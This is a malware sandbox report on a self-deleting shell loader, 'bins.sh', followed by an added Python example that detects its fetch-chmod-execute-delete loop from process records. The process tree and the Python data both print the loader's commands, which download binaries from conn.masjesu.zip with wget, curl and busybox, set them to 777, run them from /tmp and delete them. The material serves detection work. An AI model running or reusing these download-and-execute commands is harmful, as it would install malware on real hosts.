Analysis
Max time kernel: 599s
Max time network: 481s
Platform: ubuntu-18.04_amd64
Resource: ubuntu1804-amd64-20240611-en
Resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
Submitted: 16/12/2024, 04:16
Static task: static1
Behavioral task behavioral1: sample bins.sh, resource debian12-armhf-20240221-en
Behavioral task behavioral2: sample bins.sh, resource debian12-mipsel-20240221-en
Behavioral task behavioral3: sample bins.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral4: sample bins.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral5: sample bins.sh, resource debian9-mipsel-20240729-en
Behavioral task behavioral6: sample bins.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral7: sample bins.sh, resource ubuntu2404-amd64-20240523-en
General
Target: bins.sh
Size: 10KB
MD5: 7c06e835a83b81914ba9a19c15e66d76
SHA1: bc618204890c0b179a00d6d253001a6e27197aa1
SHA256: cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
SHA512: 4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2
SSDEEP: 192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu
Malware Config
Signatures
File and Directory Permissions Modification (1 TTP, 1 IoC)
Adversaries may modify file or directory permissions to evade defenses.
pid / process: 1632 chmod
System Network Configuration Discovery (1 TTP, 5 IoCs)
Adversaries may gather information about the network configuration of a system.
pid / process: 1635 wget, 1638 curl, 1478 wget, 1482 curl, 1628 busybox
Processes
/tmp/bins.sh  cmd: /tmp/bins.sh  PID:1471
  /bin/rm  cmd: /bin/rm bins.sh  PID:1477
  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  PID:1478  sig: System Network Configuration Discovery
  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  PID:1482  sig: System Network Configuration Discovery
  /bin/busybox  cmd: /bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  PID:1628  sig: System Network Configuration Discovery
  /bin/chmod  cmd: chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  PID:1632  sig: File and Directory Permissions Modification
  /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  cmd: ./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  PID:1633
  /bin/rm  cmd: rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA  PID:1634
  /usr/bin/wget  cmd: wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  PID:1635  sig: System Network Configuration Discovery
  /usr/bin/curl  cmd: curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX  PID:1638  sig: System Network Configuration Discovery
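The process tree above is the usual multi-architecture loader loop: the script deletes itself, then for each payload name tries wget, then curl, then busybox wget against conn.masjesu.zip, chmods the result to 777, runs it from /tmp and removes it before moving to the next name. The sandbox files the fetch commands under System Network Configuration Discovery; their command lines show they are payload downloads, so the detection below keys on the fetch, chmod, execute, delete sequence per file rather than on the signature names. This is an added example, not sandbox output or code from the sample. The process records are constructed from this report, and a parent pid of 1471 for the level-2 entries is assumed from the tree's nesting.

```python
# Added example: reconstruct the fetch -> chmod -> execute -> delete loop
# from process records (pid, ppid, image path, command line).
import re
import shlex
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlparse


@dataclass
class Proc:
    pid: int
    ppid: int
    path: str     # image path as the sandbox reports it
    cmdline: str  # command line as the sandbox reports it


@dataclass
class Chain:
    filename: str
    url: str = ""
    fetch_pids: List[int] = field(default_factory=list)
    chmod_pid: Optional[int] = None
    exec_pid: Optional[int] = None
    rm_pid: Optional[int] = None

    @property
    def complete(self) -> bool:
        """True when every stage of the loop was seen for this payload file."""
        return bool(self.fetch_pids) and None not in (self.chmod_pid, self.exec_pid, self.rm_pid)


URL_RE = re.compile(r"https?://\S+")
FETCH_TOOLS = {"wget", "curl"}


def basename(s: str) -> str:
    return s.rstrip("/").rsplit("/", 1)[-1]


def argv_of(p: Proc) -> List[str]:
    """Split the command line; '/bin/busybox wget ...' counts as a wget invocation."""
    args = shlex.split(p.cmdline)
    if len(args) > 1 and basename(args[0]) == "busybox":
        args = args[1:]
    return args


def grants_exec(mode: str) -> bool:
    """chmod mode that sets any execute bit: numeric (777, 0755) or symbolic (+x, a+rx)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return int(mode, 8) & 0o111 != 0
    return "+" in mode and "x" in mode.split("+", 1)[1]


def find_dropper_chains(procs: List[Proc]) -> List[Chain]:
    """Group processes by the payload file they touch and record each stage's pid."""
    chains: Dict[str, Chain] = {}
    for p in sorted(procs, key=lambda x: x.pid):  # report order is pid order here
        args = argv_of(p)
        if not args:
            continue
        tool = basename(args[0])
        if tool in FETCH_TOOLS:
            m = URL_RE.search(p.cmdline)
            if m:
                name = basename(urlparse(m.group()).path)
                chains.setdefault(name, Chain(name, url=m.group())).fetch_pids.append(p.pid)
        elif tool == "chmod" and len(args) >= 3 and grants_exec(args[1]):
            if basename(args[-1]) in chains:
                chains[basename(args[-1])].chmod_pid = p.pid
        elif tool == "rm":
            for target in args[1:]:
                if not target.startswith("-") and basename(target) in chains:
                    chains[basename(target)].rm_pid = p.pid
        elif tool in chains and basename(p.path) == tool:
            chains[tool].exec_pid = p.pid  # the payload itself ran, e.g. ./<name>
    return list(chains.values())


def self_deleting_scripts(procs: List[Proc]) -> Dict[int, int]:
    """Map script pid -> pid of a child rm that removed the script's own file."""
    by_pid = {p.pid: p for p in procs}
    found: Dict[int, int] = {}
    for p in procs:
        parent, args = by_pid.get(p.ppid), argv_of(p)
        if parent and args and basename(args[0]) == "rm":
            if basename(parent.path) in {basename(a) for a in args[1:]}:
                found[parent.pid] = p.pid
    return found


# Constructed from the process tree in this report (ppid 1471 assumed from nesting).
B = "http://conn.masjesu.zip/bins/"
P1, P2 = "YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA", "CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX"
PROCS = [
    Proc(1471, 1, "/tmp/bins.sh", "/tmp/bins.sh"),
    Proc(1477, 1471, "/bin/rm", "/bin/rm bins.sh"),
    Proc(1478, 1471, "/usr/bin/wget", "wget " + B + P1),
    Proc(1482, 1471, "/usr/bin/curl", "curl -O " + B + P1),
    Proc(1628, 1471, "/bin/busybox", "/bin/busybox wget " + B + P1),
    Proc(1632, 1471, "/bin/chmod", "chmod 777 " + P1),
    Proc(1633, 1471, "/tmp/" + P1, "./" + P1),
    Proc(1634, 1471, "/bin/rm", "rm " + P1),
    Proc(1635, 1471, "/usr/bin/wget", "wget " + B + P2),
    Proc(1638, 1471, "/usr/bin/curl", "curl -O " + B + P2),
]

if __name__ == "__main__":
    for c in find_dropper_chains(PROCS):
        print("complete" if c.complete else "partial", c.filename, c.url,
              "fetch", c.fetch_pids, "chmod", c.chmod_pid, "exec", c.exec_pid, "rm", c.rm_pid)
    print("self-deleting scripts:", self_deleting_scripts(PROCS))
```

Run against the records above, the first payload comes back as a complete chain (three fetch attempts, chmod, execution, removal) and the second as partial, because the report is cut off after its two fetch attempts. On a live host the same logic applies to execve audit or EDR process events; the parent-child relationship and the per-file sequence are what distinguish this loop from an admin running wget once.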